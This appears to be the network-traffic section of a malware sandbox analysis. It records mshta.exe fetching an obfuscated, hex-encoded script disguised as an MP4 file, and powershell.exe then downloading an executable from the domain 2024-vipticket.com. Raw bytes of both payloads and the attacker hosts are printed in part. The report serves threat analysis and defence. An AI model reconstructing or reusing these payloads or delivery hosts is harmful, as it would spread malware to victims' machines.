Dec 6, 2024 15:27:08.679616928 CET	1.1.1.1	192.168.2.5	0x6d66	No error (0)	bendydully.click		172.67.161.203	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wserdtfyguhij.2024-vipticket.com

bendydully.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.219.101	443	1088	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:25:41 UTC	341	OUT	GET /k.mp4 HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: wserdtfyguhij.2024-vipticket.com Connection: Keep-Alive
2024-12-06 14:25:42 UTC	941	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:25:42 GMT Content-Type: video/mp4 Content-Length: 332547 Connection: close Accept-Ranges: bytes ETag: "9ee7de5521c2ffc393e53a924cbc6dbe" Last-Modified: Fri, 06 Dec 2024 13:07:05 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSeRHW3MGjy4US61RAFDgrPRL9OOgbDXAzOIoUHQEx2GwU%2BmE06Pfu%2FW27PcH6u%2Ba8r08qDG%2FXTMK34%2Fe%2FXFdFba03X9GzGkxnb%2FPiHFki0M7orEvvzOeodgzFsm%2FGtzUmh0yw11A5CZMKIi1n%2FH%2BZ5L6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf25eda9d425b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1775&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2881&recv_bytes=923&delivery_rate=1610590&cwnd=236&unsent_bytes=0&cid=eef34d352ef1400b&ts=817&x=0"
2024-12-06 14:25:42 UTC	428	IN	Data Raw: 36 36 6e 37 35 47 36 65 57 36 33 57 37 34 4b 36 39 6f 36 66 57 36 65 68 32 30 51 37 37 71 37 37 57 36 64 76 35 36 53 37 33 7a 32 38 59 37 36 6e 36 33 77 36 65 44 37 30 67 32 39 73 37 62 61 37 36 4a 36 31 66 37 32 69 32 30 62 36 33 71 36 63 6a 36 32 73 36 32 4c 35 37 79 34 62 7a 33 64 4c 32 30 7a 32 37 57 32 37 68 33 62 6d 36 36 47 36 66 50 37 32 51 32 30 6d 32 38 7a 37 36 63 36 31 4a 37 32 67 32 30 6b 36 31 76 35 37 45 34 37 76 37 31 45 35 38 7a 32 30 74 33 64 49 32 30 45 33 30 45 33 62 6f 36 31 64 35 37 61 34 37 6e 37 31 76 35 38 55 32 30 45 33 63 65 32 30 56 37 36 53 36 33 71 36 65 4b 37 30 76 32 65 77 36 63 53 36 35 6c 36 65 68 36 37 67 37 34 6d 36 38 75 33 62 73 32 30 79 36 31 7a 35 37 7a 34 37 79 37 31 66 35 38 6d 32 62 6f 32 62 6e 32 39 4c 37 62 46 Data Ascii: 66n75G6eW63W74K69o6fW6eh20Q77q77W6dv56S73z28Y76n63w6eD70g29s7ba76J61f72i20b63q6cj62s62L57y4bz3dL20z27W27h3bm66G6fP72Q20m28z76c61J72g20k61v57E47v71E58z20t3dI20E30E3bo61d57a47n71v58U20E3ce20V76S63q6eK70v2ew6cS65l6eh67g74m68u3bs20y61z57z47y71f58m2bo2bn29L7bF
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 69 32 30 71 36 33 5a 36 63 6b 36 32 65 36 32 45 35 37 50 34 62 51 32 30 65 32 62 77 32 30 65 34 64 70 36 62 57 37 38 79 35 30 74 37 64 4f 37 32 73 36 35 45 37 34 41 37 35 68 37 32 78 36 65 6e 32 30 7a 36 33 56 36 63 52 36 32 50 36 32 6a 35 37 44 34 62 46 37 64 56 33 62 51 37 36 55 36 31 66 37 32 47 32 30 54 36 33 58 36 63 70 36 32 70 36 32 6a 35 37 48 34 62 61 32 30 76 33 64 74 32 30 75 37 37 65 37 37 55 36 64 43 35 36 68 37 33 6c 32 38 77 35 62 63 33 31 6f 33 30 73 33 36 6d 33 33 41 32 63 75 33 31 72 33 30 44 33 36 53 33 32 4f 32 63 56 33 31 4c 33 30 4c 33 37 49 33 30 67 32 63 4a 33 31 4b 33 30 50 33 35 65 33 32 56 32 63 5a 33 31 43 33 30 56 33 36 74 33 35 47 32 63 42 33 31 75 33 30 46 33 36 72 33 36 78 32 63 4e 33 31 43 33 30 52 33 35 4a 33 35 73 32 63 Data Ascii: i20q63Z6ck62e62E57P4bQ20e2bw20e4dp6bW78y50t7dO72s65E74A75h72x6en20z63V6cR62P62j57D4bF7dV3bQ76U61f72G20T63X6cp62p62j57H4ba20v3dt20u77e77U6dC56h73l28w5bc31o30s36m33A2cu31r30D36S32O2cV31L30L37I30g2cJ31K30P35e32V2cZ31C30V36t35G2cB31u30F36r36x2cN31C30R35J35s2c
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 33 39 4d 33 38 68 33 33 68 32 63 6e 33 39 4f 33 39 55 33 36 79 32 63 4f 33 31 59 33 30 6d 33 36 75 33 35 62 32 63 4d 33 31 66 33 30 4e 33 35 6d 33 32 4e 32 63 71 33 31 4a 33 30 74 33 36 58 33 33 64 32 63 42 33 31 65 33 30 69 33 35 79 33 39 4f 32 63 6d 33 31 61 33 30 6f 33 34 4a 33 38 42 32 63 48 33 31 65 33 30 51 33 35 52 33 30 6d 32 63 68 33 31 6c 33 30 53 33 35 4f 33 32 63 32 63 78 33 39 69 33 38 50 33 33 44 32 63 4a 33 39 79 33 39 59 33 30 74 32 63 52 33 39 54 33 39 55 33 37 78 32 63 78 33 39 6a 33 39 67 33 37 44 32 63 45 33 39 50 33 39 46 33 30 4c 32 63 6f 33 39 6b 33 39 63 33 35 74 32 63 54 33 39 69 33 38 50 33 33 76 32 63 7a 33 39 66 33 39 46 33 30 71 32 63 65 33 39 76 33 39 66 33 39 53 32 63 50 33 31 66 33 30 70 33 37 51 33 31 4f 32 63 68 33 39 58 Data Ascii: 39M38h33h2cn39O39U36y2cO31Y30m36u35b2cM31f30N35m32N2cq31J30t36X33d2cB31e30i35y39O2cm31a30o34J38B2cH31e30Q35R30m2ch31l30S35O32c2cx39i38P33D2cJ39y39Y30t2cR39T39U37x2cx39j39g37D2cE39P39F30L2co39k39c35t2cT39i38P33v2cz39f39F30q2ce39v39f39S2cP31f30p37Q31O2ch39X
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 30 78 33 32 59 33 30 57 32 63 4f 33 39 6f 33 39 46 33 39 7a 32 63 6c 33 31 72 33 30 6a 33 32 78 33 31 71 32 63 55 33 31 6c 33 30 4c 33 31 41 33 36 56 32 63 75 33 31 6f 33 30 5a 33 30 62 33 34 72 32 63 6e 33 31 44 33 30 5a 33 30 54 33 34 46 32 63 4b 33 31 41 33 30 6f 33 31 74 33 39 57 32 63 54 33 31 52 33 30 58 33 32 43 33 31 7a 32 63 44 33 31 68 33 30 4e 33 31 70 33 36 4a 32 63 6a 33 31 75 33 30 79 33 30 6d 33 33 71 32 63 5a 33 31 4d 33 30 75 33 30 54 33 30 48 32 63 5a 33 31 41 33 30 73 33 31 47 33 37 6b 32 63 54 33 31 70 33 30 55 33 31 41 33 37 6f 32 63 6c 33 31 43 33 30 71 33 31 62 33 38 58 32 63 44 33 39 4e 33 39 4a 33 39 42 32 63 52 33 31 4e 33 30 62 33 30 6b 33 31 53 32 63 48 33 31 73 33 30 45 33 30 6e 33 31 64 32 63 66 33 39 78 33 39 46 33 39 55 32 Data Ascii: 0x32Y30W2cO39o39F39z2cl31r30j32x31q2cU31l30L31A36V2cu31o30Z30b34r2cn31D30Z30T34F2cK31A30o31t39W2cT31R30X32C31z2cD31h30N31p36J2cj31u30y30m33q2cZ31M30u30T30H2cZ31A30s31G37k2cT31p30U31A37o2cl31C30q31b38X2cD39N39J39B2cR31N30b30k31S2cH31s30E30n31d2cf39x39F39U2
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 4a 33 31 4c 33 30 42 33 31 66 33 38 48 32 63 68 33 31 41 33 30 4a 33 32 41 33 30 4c 32 63 70 33 31 4d 33 30 59 33 30 52 33 38 44 32 63 71 33 31 4b 33 30 74 33 30 44 33 36 65 32 63 59 33 31 78 33 30 58 33 30 79 33 32 4d 32 63 45 33 31 69 33 30 45 33 30 6a 33 33 6b 32 63 74 33 31 64 33 30 67 33 31 6e 33 39 6a 32 63 45 33 31 64 33 30 79 33 31 53 33 39 58 32 63 78 33 31 6c 33 30 4b 33 30 4c 33 36 58 32 63 52 33 31 75 33 30 4d 33 30 69 33 32 5a 32 63 4b 33 31 41 33 30 45 33 30 54 33 36 42 32 63 4d 33 31 6f 33 30 43 33 30 54 33 30 44 32 63 7a 33 39 77 33 39 5a 33 39 50 32 63 52 33 31 4c 33 30 67 33 30 6c 33 35 69 32 63 7a 33 31 4e 33 30 4d 33 30 62 33 37 67 32 63 67 33 31 6e 33 30 6e 33 30 4c 33 37 62 32 63 76 33 31 4a 33 30 56 33 31 57 33 37 4a 32 63 61 33 31 Data Ascii: J31L30B31f38H2ch31A30J32A30L2cp31M30Y30R38D2cq31K30t30D36e2cY31x30X30y32M2cE31i30E30j33k2ct31d30g31n39j2cE31d30y31S39X2cx31l30K30L36X2cR31u30M30i32Z2cK31A30E30T36B2cM31o30C30T30D2cz39w39Z39P2cR31L30g30l35i2cz31N30M30b37g2cg31n30n30L37b2cv31J30V31W37J2ca31
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 33 30 75 33 36 45 32 63 42 33 31 6c 33 30 43 33 32 76 33 31 44 32 63 52 33 31 72 33 30 6b 33 30 4a 33 37 67 32 63 43 33 31 57 33 30 71 33 30 4e 33 30 4b 32 63 74 33 31 6f 33 30 6e 33 31 4f 33 38 6f 32 63 6c 33 31 6b 33 30 77 33 30 50 33 37 62 32 63 53 33 31 72 33 30 4f 33 31 45 33 37 49 32 63 4c 33 31 58 33 30 69 33 30 43 33 35 57 32 63 4c 33 31 41 33 30 7a 33 31 52 33 38 74 32 63 61 33 31 47 33 30 7a 33 30 76 33 38 56 32 63 66 33 31 4e 33 30 71 33 31 6d 33 37 56 32 63 75 33 31 55 33 30 48 33 30 46 33 35 54 32 63 52 33 31 70 33 30 6e 33 30 55 33 31 6c 32 63 5a 33 31 63 33 30 66 33 30 42 33 36 56 32 63 65 33 31 6f 33 30 6f 33 30 71 33 38 79 32 63 74 33 31 6f 33 30 56 33 31 55 33 37 4e 32 63 65 33 31 6b 33 30 42 33 30 75 33 37 76 32 63 45 33 31 42 33 30 63 Data Ascii: 30u36E2cB31l30C32v31D2cR31r30k30J37g2cC31W30q30N30K2ct31o30n31O38o2cl31k30w30P37b2cS31r30O31E37I2cL31X30i30C35W2cL31A30z31R38t2ca31G30z30v38V2cf31N30q31m37V2cu31U30H30F35T2cR31p30n30U31l2cZ31c30f30B36V2ce31o30o30q38y2ct31o30V31U37N2ce31k30B30u37v2cE31B30c
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 36 4c 32 63 48 33 39 65 33 39 55 33 39 53 32 63 45 33 31 67 33 30 65 33 30 66 33 38 6b 32 63 62 33 31 42 33 30 42 33 30 64 33 31 6c 32 63 6c 33 31 5a 33 30 49 33 30 50 33 30 4b 32 63 62 33 31 59 33 30 55 33 32 59 33 31 6c 32 63 6d 33 31 54 33 30 6c 33 30 67 33 36 66 32 63 4c 33 31 58 33 30 73 33 32 48 33 31 4d 32 63 42 33 31 54 33 30 74 33 30 73 33 35 66 32 63 56 33 31 79 33 30 50 33 30 64 33 34 55 32 63 73 33 31 56 33 30 58 33 30 49 33 30 4b 32 63 65 33 31 73 33 30 67 33 30 71 33 33 57 32 63 6e 33 31 6d 33 30 47 33 30 69 33 33 67 32 63 6c 33 31 76 33 30 79 33 30 7a 33 30 5a 32 63 44 33 31 4a 33 30 75 33 31 51 33 39 6b 32 63 52 33 31 66 33 30 51 33 30 6a 33 38 6f 32 63 64 33 31 4a 33 30 71 33 30 44 33 35 73 32 63 52 33 39 76 33 39 64 33 39 56 32 63 42 33 Data Ascii: 6L2cH39e39U39S2cE31g30e30f38k2cb31B30B30d31l2cl31Z30I30P30K2cb31Y30U32Y31l2cm31T30l30g36f2cL31X30s32H31M2cB31T30t30s35f2cV31y30P30d34U2cs31V30X30I30K2ce31s30g30q33W2cn31m30G30i33g2cl31v30y30z30Z2cD31J30u31Q39k2cR31f30Q30j38o2cd31J30q30D35s2cR39v39d39V2cB3
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 4b 33 31 70 33 38 4e 32 63 59 33 31 7a 33 30 42 33 31 6b 33 36 6d 32 63 42 33 31 78 33 30 6f 33 30 72 33 35 50 32 63 54 33 31 62 33 30 52 33 30 4f 33 34 6a 32 63 42 33 31 65 33 30 53 33 30 70 33 31 64 32 63 66 33 31 51 33 30 45 33 31 72 33 38 58 32 63 6c 33 31 77 33 30 4c 33 31 4c 33 37 62 32 63 59 33 31 70 33 30 7a 33 31 79 33 39 56 32 63 72 33 31 44 33 30 6f 33 30 42 33 34 52 32 63 59 33 31 64 33 30 45 33 30 71 33 33 55 32 63 6d 33 31 69 33 30 52 33 32 77 33 30 65 32 63 71 33 31 65 33 30 56 33 32 4c 33 30 69 32 63 49 33 31 76 33 30 4a 33 31 4e 33 36 42 32 63 46 33 31 6c 33 30 63 33 30 50 33 31 71 32 63 64 33 31 63 33 30 54 33 30 74 33 37 73 32 63 78 33 31 71 33 30 52 33 31 58 33 38 46 32 63 43 33 31 4d 33 30 4e 33 31 58 33 39 6b 32 63 43 33 31 65 33 30 Data Ascii: K31p38N2cY31z30B31k36m2cB31x30o30r35P2cT31b30R30O34j2cB31e30S30p31d2cf31Q30E31r38X2cl31w30L31L37b2cY31p30z31y39V2cr31D30o30B34R2cY31d30E30q33U2cm31i30R32w30e2cq31e30V32L30i2cI31v30J31N36B2cF31l30c30P31q2cd31c30T30t37s2cx31q30R31X38F2cC31M30N31X39k2cC31e30
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 33 30 6b 33 31 4e 33 39 6c 32 63 4d 33 31 4e 33 30 67 33 32 61 33 31 44 32 63 6d 33 31 61 33 30 65 33 30 70 33 37 42 32 63 6b 33 31 66 33 30 76 33 30 50 33 32 58 32 63 50 33 31 49 33 30 43 33 32 57 33 30 52 32 63 54 33 31 70 33 30 47 33 30 7a 33 32 58 32 63 41 33 31 6b 33 30 4c 33 30 58 33 31 43 32 63 57 33 31 50 33 30 4e 33 30 68 33 36 4b 32 63 67 33 31 44 33 30 46 33 30 48 33 31 68 32 63 52 33 31 6f 33 30 69 33 32 69 33 30 76 32 63 71 33 31 63 33 30 66 33 30 4c 33 30 73 32 63 53 33 31 43 33 30 4e 33 30 76 33 36 52 32 63 58 33 31 47 33 30 68 33 30 43 33 38 43 32 63 42 33 31 50 33 30 47 33 30 6e 33 30 66 32 63 56 33 31 53 33 30 4f 33 30 46 33 35 71 32 63 4c 33 31 43 33 30 76 33 30 70 33 30 7a 32 63 65 33 31 47 33 30 59 33 30 44 33 37 67 32 63 59 33 31 45 Data Ascii: 30k31N39l2cM31N30g32a31D2cm31a30e30p37B2ck31f30v30P32X2cP31I30C32W30R2cT31p30G30z32X2cA31k30L30X31C2cW31P30N30h36K2cg31D30F30H31h2cR31o30i32i30v2cq31c30f30L30s2cS31C30N30v36R2cX31G30h30C38C2cB31P30G30n30f2cV31S30O30F35q2cL31C30v30p30z2ce31G30Y30D37g2cY31E
2024-12-06 14:25:42 UTC	1369	IN	Data Raw: 31 4f 33 38 61 32 63 61 33 31 78 33 30 6a 33 30 7a 33 35 59 32 63 56 33 31 58 33 30 69 33 30 73 33 36 42 32 63 4a 33 31 4b 33 30 48 33 30 79 33 35 61 32 63 41 33 31 55 33 30 52 33 31 61 33 38 58 32 63 47 33 39 79 33 39 43 33 39 69 32 63 56 33 31 6f 33 30 76 33 30 51 33 33 63 32 63 56 33 31 55 33 30 4a 33 30 66 33 32 69 32 63 6c 33 31 52 33 30 71 33 32 6a 33 31 4b 32 63 45 33 31 49 33 30 61 33 31 68 33 39 52 32 63 62 33 31 79 33 30 4a 33 30 4a 33 34 54 32 63 51 33 31 4c 33 30 47 33 30 5a 33 31 71 32 63 55 33 31 62 33 30 76 33 32 42 33 31 65 32 63 6b 33 31 61 33 30 47 33 30 47 33 30 58 32 63 68 33 31 41 33 30 65 33 31 59 33 38 4d 32 63 49 33 31 4a 33 30 6c 33 30 48 33 35 56 32 63 4f 33 31 66 33 30 51 33 32 6b 33 31 48 32 63 57 33 31 65 33 30 6d 33 31 77 33 Data Ascii: 1O38a2ca31x30j30z35Y2cV31X30i30s36B2cJ31K30H30y35a2cA31U30R31a38X2cG39y39C39i2cV31o30v30Q33c2cV31U30J30f32i2cl31R30q32j31K2cE31I30a31h39R2cb31y30J30J34T2cQ31L30G30Z31q2cU31b30v32B31e2ck31a30G30G30X2ch31A30e31Y38M2cI31J30l30H35V2cO31f30Q32k31H2cW31e30m31w3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	172.67.219.101	443	7056	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:25:46 UTC	103	OUT	GET /IntroductoryTunes.exe HTTP/1.1 Host: wserdtfyguhij.2024-vipticket.com Connection: Keep-Alive
2024-12-06 14:25:46 UTC	941	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:25:46 GMT Content-Type: application/octet-stream Content-Length: 1007262 Connection: close Accept-Ranges: bytes ETag: "12b325f869ea3948fd7addbcd59aac1c" Last-Modified: Fri, 06 Dec 2024 13:06:25 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9I1yusoNkmaK2O5HqNcl3RWzMh8aftmgWyVgXdGSkW1JGyYPYTxMXZLA3UY%2BTlAzJqU1XkE2Ra6Cb7yNM9HXuvIPSs4ghF%2FOxqK00vnSZ41GSQQaWlwKQcZnb54Zur2mIFviOlKnxtWJG9EMlkQ37IetSg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf279fb0e7d06-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1843&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2883&recv_bytes=717&delivery_rate=1577525&cwnd=244&unsent_bytes=0&cid=b761d182cf897c42&ts=719&x=0"
2024-12-06 14:25:46 UTC	428	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 9e 07 00 00 42 00 00 af 38 00 00 00 10 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
2024-12-06 14:25:46 UTC	1369	IN	Data Raw: d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 a6 2c 00 00 00 00 10 00 00 2e 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 30 10 00 00 10 00 00 00 dc 00 00 00 00 00 Data Ascii: .textrt `.rdatan+,x@@.data+@.ndata.rsrc,.@@.reloc0
2024-12-06 14:25:46 UTC	1369	IN	Data Raw: 00 00 57 8b 3d cc ea 47 00 89 45 f8 8b 45 f8 33 db 39 18 74 4d 3b df 73 47 8b 35 c8 ea 47 00 83 c6 08 8b 16 f6 c2 06 75 2a 8b 45 08 85 c0 74 06 83 3c 98 00 74 1d 8b 4d fc 33 c0 40 d3 e0 8b 4e fc 83 e2 01 23 c8 89 4d f4 8b 4d fc d3 e2 39 55 f4 75 0b 43 81 c6 20 40 00 00 3b df 72 c4 3b df 74 0d ff 45 fc 83 45 f8 04 83 7d fc 20 72 9d 8b 45 fc 5f 5e 5b c9 c2 04 00 8b 44 24 04 85 c0 79 14 40 69 c0 08 40 00 00 b9 00 f0 47 00 2b c8 51 e8 fc 4b 00 00 c2 04 00 56 8b 74 24 08 eb 68 8b c6 6b c0 1c 03 05 d0 ea 47 00 83 38 01 74 5c 50 e8 e6 01 00 00 3d ff ff ff 7f 74 55 50 e8 b7 ff ff ff 85 c0 75 04 40 46 eb 07 48 8b ce 8b f0 2b c1 83 7c 24 0c 00 74 2f 01 05 8c 6a 47 00 6a 00 ff 35 84 6a 47 00 68 30 75 00 00 ff 35 8c 6a 47 00 ff 15 50 91 40 00 50 68 02 04 00 00 ff 74 Data Ascii: W=GEE39tM;sG5Gu*Et<tM3@N#MM9UuC @;r;tEE} rE_^[D$y@i@G+QKVt$hkG8t\P=tUPu@FH+\|$t/jGj5jGh0u5jGP@Pht
2024-12-06 14:25:46 UTC	1369	IN	Data Raw: 0f 85 7a ff ff ff 68 f0 00 41 00 39 5d d8 74 22 6a e6 e8 29 37 00 00 ff 75 08 68 b0 70 4d 00 e8 b3 47 00 00 ff 75 08 ff 15 78 90 40 00 e9 53 18 00 00 6a f5 e9 f2 fd ff ff 53 e8 bf fb ff ff 8b f0 56 e8 5c 4a 00 00 85 c0 74 19 ff 75 d8 56 68 20 9d 40 00 e8 18 4a 00 00 83 c4 0c 8b 45 d8 e9 2c 18 00 00 ff 75 dc 56 68 b8 9c 40 00 e8 ff 49 00 00 83 c4 0c 8b 45 dc e9 13 18 00 00 6a d0 e8 7a fb ff ff 6a df 8b f0 e8 71 fb ff ff 6a 13 89 45 08 e8 67 fb ff ff 8b f8 57 68 9c 9c 40 00 e8 cd 49 00 00 59 59 ff 75 08 56 ff 15 74 90 40 00 85 c0 74 0c 68 f0 00 41 00 6a e3 e9 6b fd ff ff 39 5d dc 74 27 56 e8 d8 49 00 00 85 c0 74 1d ff 75 08 56 e8 5e 53 00 00 68 f0 00 41 00 6a e4 e8 5c 36 00 00 57 68 70 9c 40 00 eb 0d 57 68 4c 9c 40 00 c7 45 fc 01 00 00 00 e8 73 49 00 00 59 Data Ascii: zhA9]t"j)7uhpMGux@SjSV\JtuVh @JE,uVh@IEjzjqjEgWh@IYYuVt@thAjk9]t'VItuV^ShAj\6Whp@WhL@EsIY
2024-12-06 14:25:46 UTC	1369	IN	Data Raw: 75 0c 33 c0 c7 45 fc 01 00 00 00 66 89 06 33 c0 66 89 86 06 40 00 00 e9 10 13 00 00 33 c9 e8 6c f6 ff ff 33 c9 41 8b f0 e8 62 f6 ff ff 39 5d e8 75 16 3b f0 0f 8c a8 fe ff ff 0f 8e dc fa ff ff 8b 45 e4 e9 ef 12 00 00 3b f0 0f 82 92 fe ff ff 0f 86 c6 fa ff ff eb e8 33 c9 41 e8 2f f6 ff ff 6a 02 59 8b f8 e8 25 f6 ff ff 8b c8 8b 45 e0 83 f8 0c 77 69 ff 24 85 18 32 40 00 03 f9 eb 5e 2b f9 eb 5a 0f af f9 eb 55 3b cb 74 07 8b c7 99 f7 f9 eb 1e 33 ff c7 45 fc 01 00 00 00 eb 3f 0b f9 eb 3b 23 f9 eb 37 33 f9 eb 33 33 c0 3b fb 0f 94 c0 8b f8 eb 28 3b fb 75 04 3b cb 74 09 33 ff 47 eb 1b 3b fb 75 f3 33 ff eb 13 3b cb 74 c5 8b c7 99 f7 f9 8b fa eb 06 d3 e7 eb 02 d3 ff 57 e9 43 12 00 00 6a 01 e8 bb f5 ff ff 6a 02 59 8b f8 e8 9b f5 ff ff 50 57 56 ff 15 48 92 40 00 e9 d2 Data Ascii: u3Ef3f@3l3Ab9]u;E;3A/jY%Ewi$2@^+ZU;t3E?;#7333;(;u;t3G;u3;tWCjjYPWVH@
2024-12-06 14:25:46 UTC	1369	IN	Data Raw: 00 33 c9 66 89 0e 89 45 f0 66 89 0f c7 45 fc 01 00 00 00 3b c3 0f 84 b8 0d 00 00 50 6a 40 ff 15 24 91 40 00 89 45 08 3b c3 0f 84 a4 0d 00 00 50 ff 75 f0 53 ff 75 bc e8 34 5f 00 00 85 c0 74 34 8d 45 bc 50 8d 45 f8 50 68 38 98 40 00 ff 75 08 e8 15 5f 00 00 85 c0 74 1b 8b 45 f8 ff 70 08 56 e8 08 3c 00 00 8b 45 f8 ff 70 0c 57 e8 fc 3b 00 00 89 5d fc ff 75 08 ff 15 30 91 40 00 e9 51 0d 00 00 6a 11 e8 c3 f0 ff ff 68 04 20 00 00 8b f8 56 57 e8 7d 4e 00 00 83 c4 0c 85 c0 75 07 c7 45 fc 01 00 00 00 56 57 68 f0 97 40 00 e9 c5 f7 ff ff 6a 11 e8 94 f0 ff ff 68 04 20 00 00 8b f8 56 57 e8 c0 4e 00 00 83 c4 0c 85 c0 75 07 c7 45 fc 01 00 00 00 56 57 68 ac 97 40 00 e9 96 f7 ff ff c7 45 fc 01 00 00 00 39 1d 98 eb 47 00 0f 8c e2 00 00 00 6a f0 e8 52 f0 ff ff 6a 01 8b f8 e8 Data Ascii: 3fEfE;Pj@$@E;PuSu4_t4EPEPh8@u_tEpV<EpW;]u0@Qjh VW}NuEVWh@jh VWNuEVWh@E9GjRj
2024-12-06 14:25:46 UTC	1369	IN	Data Raw: 50 e8 2e ec ff ff 89 45 ec 39 5d ec 0f 84 68 08 00 00 e9 93 f1 ff ff 3b d3 74 04 8b fa eb 0c 8b 3d 64 eb 47 00 81 c7 01 00 00 80 8b 45 e4 89 45 f0 8b 45 e8 6a 02 89 45 ec e8 b5 eb ff ff 6a 11 89 45 f4 e8 ab eb ff ff 57 89 45 08 e8 32 39 00 00 59 53 89 45 cc 8d 45 bc 50 a1 90 eb 47 00 53 83 c8 02 50 53 53 53 ff 75 08 33 f6 46 57 89 75 fc ff 15 14 90 40 00 85 c0 0f 85 07 01 00 00 89 5d f8 bf f8 40 41 00 39 75 f0 75 42 6a 23 e8 60 eb ff ff 57 e8 49 37 00 00 57 ff 75 f4 8d 44 00 02 ff 75 08 89 45 f8 ff 75 cc 39 75 ec 75 12 68 e4 94 40 00 e8 ad 39 00 00 83 c4 14 e9 84 00 00 00 68 98 94 40 00 e8 9b 39 00 00 83 c4 14 6a 04 5e 39 75 f0 75 27 6a 03 59 e8 ff ea ff ff 50 ff 75 f4 a3 f8 40 41 00 ff 75 08 89 75 f8 ff 75 cc 68 48 94 40 00 e8 6c 39 00 00 83 c4 14 83 7d Data Ascii: P.E9]h;t=dGEEEjEjEWE29YSEEPGSPSSSu3FWu@]@A9uuBj#`WI7WuDuEu9uuh@9h@9j^9uu'jYPu@AuuuhH@l9}
2024-12-06 14:25:46 UTC	1369	IN	Data Raw: 60 91 40 00 39 5d d8 0f 8c 14 03 00 00 50 57 e9 08 03 00 00 66 39 1e 0f 84 04 03 00 00 56 e8 b1 31 00 00 50 ff 15 64 91 40 00 e9 f2 02 00 00 66 39 1f 0f 84 f2 eb ff ff 8d 85 54 fc ff ff 50 57 e8 8f 31 00 00 50 ff 15 68 91 40 00 85 c0 0f 84 d6 eb ff ff eb 2b 6a 02 e8 3d e6 ff ff 8d 8d 54 fc ff ff 51 50 ff 15 6c 91 40 00 83 f8 ff 75 0a 33 c0 66 89 07 e9 dd fc ff ff 50 57 e8 3a 31 00 00 8d 85 80 fc ff ff 50 56 e8 e5 31 00 00 e9 8e 02 00 00 6a f0 c7 45 f0 66 fd ff ff e8 f9 e5 ff ff 8b f0 56 89 75 ec e8 e3 2e 00 00 85 c0 75 07 6a ed e8 e3 e5 ff ff 56 e8 dd 2f 00 00 6a 02 68 00 00 00 40 56 e8 f0 2f 00 00 89 45 08 83 f8 ff 0f 84 9d 00 00 00 a1 0c 